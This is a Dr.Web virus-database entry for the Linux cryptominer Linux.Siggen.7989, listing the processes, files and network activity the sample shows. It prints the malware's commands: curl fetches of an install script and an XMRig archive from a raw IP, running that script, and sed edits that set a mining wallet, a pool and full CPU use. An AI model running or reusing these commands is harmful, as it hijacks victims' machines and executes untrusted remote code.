Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Siggen.7989

Added to the Dr.Web virus database: 2024-08-27

Virus description added:

Technical Information

Malicious functions:
Manages services:
  • ['systemctl', 'stop', 'c3pool_miner.service']
Launches processes:
  • sed -i s/\x22url\x22: *\x22[^\x22]*\x22,/\x22url\x22: \x22auto.c3pool.org:19999\x22,/ /usr/workspace/config.json
  • sed -i s/\x22max-cpu-usage\x22: *[^,]*,/\x22max-cpu-usage\x22: 100,/ /usr/workspace/config.json
  • rm /tmp/xmrig.tar.gz
  • gzip -d
  • cat
  • curl -O http://103.193.148.198:90/installx.sh
  • cut -f1 -d.
  • true
  • hostname
  • bc -l
  • sleep 2
  • mkdir /usr/workspace
  • /usr/workspace/xmrig --help
  • sed -i s/\x22donate-level\x22: *[^,]*,/\x22donate-level\x22: 1,/ /usr/workspace/config.json
  • tar xf /tmp/xmrig.tar.gz -C /usr/workspace
  • sed -r s/[^a-zA-Z0-9\x5c-]+/_/g
  • sed -i s#\x22log-file\x22: *null,#\x22log-file\x22: \x22/usr/workspace/xmrig.log\x22,# /usr/workspace/config.json
  • sed -i s/\x22background\x22: *false,/\x22background\x22: true,/ /usr/workspace/config_background.json
  • sed -i s/\x22syslog\x22: *[^,]*,/\x22syslog\x22: true,/ /usr/workspace/config.json
  • nproc
  • sudo -n true
  • sudo systemctl stop c3pool_miner.service
  • sh installx.sh
  • rm -rf /usr/workspace
  • curl -L --progress-bar http://103.193.148.198:90/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  • sed -i s/\x22user\x22: *\x22[^\x22]*\x22,/\x22user\x22: \x2289LBymTxjod212nqatmPKbf5k8teMrm92fuGnWCx7yNv1gGYtpeN1WYN3Dir6QuxENDsfzZazQGcYCfwNLHHmfPd451tpv9\x22,/ /usr/workspace/config.json
  • curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/uninstall_c3pool_miner.sh
  • cp /usr/workspace/config.json /usr/workspace/config_background.json
  • rm -rf installx.sh
  • sed -i s/\x22pass\x22: *\x22[^\x22]*\x22,/\x22pass\x22: \x22debian\x22,/ /usr/workspace/config.json
  • id -u
  • bash -s
Performs operations with the file system:
Modifies file access rights:
  • /usr/workspace/xmrig
  • /usr/workspace/config.json
Modifies file owner:
  • /usr/workspace/xmrig
  • /usr/workspace/config.json
  • /usr/workspace/sedfbo2Dq
  • /usr/workspace/sedLEVCgX
  • /usr/workspace/sedxrKcl3
  • /usr/workspace/sed5f45n5
  • /usr/workspace/sedTccTcb
  • /usr/workspace/sed3W5abg
  • /usr/workspace/seddRA48m
  • /usr/workspace/seda1Okht
Creates folders:
  • /usr/workspace
Creates or modifies files:
  • /run/networkxm.pid
  • /root/installx.sh
  • /tmp/xmrig.tar.gz
  • /usr/workspace/xmrig
  • /usr/workspace/config.json
  • /usr/workspace/sedfbo2Dq
  • /usr/workspace/sedLEVCgX
  • /usr/workspace/sedxrKcl3
  • /usr/workspace/sed5f45n5
  • /usr/workspace/sedTccTcb
  • /usr/workspace/sed3W5abg
  • /usr/workspace/seddRA48m
  • /usr/workspace/config_background.json
  • /usr/workspace/seda1Okht
  • /usr/workspace/miner.sh
Deletes files:
  • /tmp/xmrig.tar.gz
Locks files:
  • /run/networkxm.pid
Changes time of creation/access/modification of files:
  • /usr/workspace/xmrig
  • /usr/workspace/config.json
Network activity:
Establishes connection:
  • 10#.##3.148.198:90
  • 8.#.8.8:53
DNS ASK:
  • do####ad.c3pool.org
Sends data to the following servers:
  • 10#.##3.148.198:90
Receives data from the following servers:
  • 10#.##3.148.198:90
Other:
Collects CPU information
Collects RAM information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number